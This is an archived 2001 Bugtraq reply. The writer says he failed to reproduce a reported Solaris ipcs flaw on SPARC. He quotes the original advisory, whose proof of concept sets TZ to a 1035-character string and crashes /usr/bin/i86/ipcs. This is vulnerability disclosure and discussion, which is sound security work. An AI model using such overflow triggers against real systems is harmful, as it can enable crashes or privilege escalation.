[20227] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (Mike Batchelor)
Mon Apr 16 14:02:44 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <LLEOLJEDPHOFANPCPKOMOEJGCCAA.mikebat@tmcs.net>
Date: Mon, 16 Apr 2001 07:22:15 -0700
Reply-To: Mike Batchelor <mikebat@TMCS.NET>
From: Mike Batchelor <mikebat@TMCS.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Failed to reproduce this problem on Solaris 2.6 and 8 for SPARC. Ipcs
behaved normally, except for printing out the long string of "A"'s in the
output header where the timezone would appear.
> Solaris ipcs vulnerability
>
> Release Date:
> April 11, 2001
>
> Systems Affected:
> Solaris 7 (x86)
> Other versions of Solaris are most likely affected also.
>
> Discovered by:
> Riley Hassell riley@eeye.com
>
> bash-2.03$ TZ=`perl -e 'print "A"x1035'`
> bash-2.03$ /usr/bin/i86/ipcs
> IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
> Message Queue facility inactive.
> T ID KEY MODE OWNER GROUP
> Shared Memory:
> m 0 0x500004d3 --rw-r--r-- root root
> Semaphore facility inactive.
> Segmentation Fault (core dumped)
